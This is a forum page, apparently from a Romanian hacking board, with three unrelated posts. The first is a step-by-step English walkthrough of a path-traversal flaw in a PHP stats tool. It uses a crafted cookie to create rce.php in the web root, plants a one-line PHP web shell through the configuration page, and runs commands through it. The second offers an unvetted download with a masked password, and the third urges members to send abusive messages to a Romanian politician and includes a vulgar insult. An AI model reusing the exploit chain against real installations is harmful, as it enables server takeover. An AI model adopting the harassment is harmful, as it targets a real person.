Leaderboard

Mai exact: https://rstforums.com/forum/83192-folosire-rep-i-like.rst#post536244

It is not an exploit, it is an advisory (few details are published at the moment). However, we can check for ourselves: Let's take a look at stats.php: if(!isset($_COOKIE['live_stats_id' . $hash])) { ... } else { # Backup from a previous request $live_stats_id = $_COOKIE['live_stats_id' . $hash]; } If the 'live_stats_id' . $hash cookie is not set, it is created (with values that we can change). Take a look here: $hash is: $hash = md5($_GET['cluster']); and cluster is a variable that we can simply set via a GET request: if(isset($_GET['cluster']) && ($_GET['cluster'] != null)){ $cluster = $_GET['cluster'];} So, if we set the $cluster variable to test, the cookie name should become: live_stats_id098f6bcd4621d373cade4e832627b4f6 The we can see that the $live_stats_id variable, which can be controlled by us, is concatenated to the end of the $file_path variable: $file_path = rtrim($_ini->get('file_path'), '/') . DIRECTORY_SEPARATOR . 'live_stats.' . $live_stats_id; The $file_path variable will become: Temp/live_stats.1022488408098f6bcd4621d373cade4e832627b4f6 We can change the cookie value to "/../../rce.php", so $file_path will become: Temp/live_stats./../../rce.php Then we can see that a file called rce.php has been created in the root directory. Now we must write code that allows us to execute commands. We go to "Edit configuration" (http://127.0.0.1/configure.php) and set this code as the hostname (of course, you can use any PHP code you want): <?php system($_GET['cmd']);?> Then save the configuration. Now all you have to execute your command (example): http://127.0.0.1/rce.php?cmd=whoami And you'll get: a:1:{s:33:"[COLOR=#ff0000][B]www-data[/B][/COLOR] :123";a:1:{s:10:"query_time";i:1;}} Have fun, I hope you learned something.

Nu sunt filtrate in abs nici un mod, pot sa fie foarte bune sau foarte proaste, n-am incercat nici unu. Link: D?unlo?d Pass: ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? Hint: 72C Edit: am verificat ceva din ele, gasiti vreo doua cu 16 gb ram, 20 gb ram.. etc

Salut. Dupa cum stiti, luni vom afla marele raspuns, cine va fi noul presedinte. Daca presedintele Romaniei va fi desemnat Victor Ponta(doamne fereste), va invit sa adresati o serie de mesaje din partea voastra care sa le trimitem la adresa lui de contact: Partidul Social Democrat (Sa fie cat de dure mesajele) Primul meu mesaj pentru el daca va ajunge presedinte: "Sa-i dau muie albinei care polenizeaza floarea de pe mormantu' lu' bunica-ta"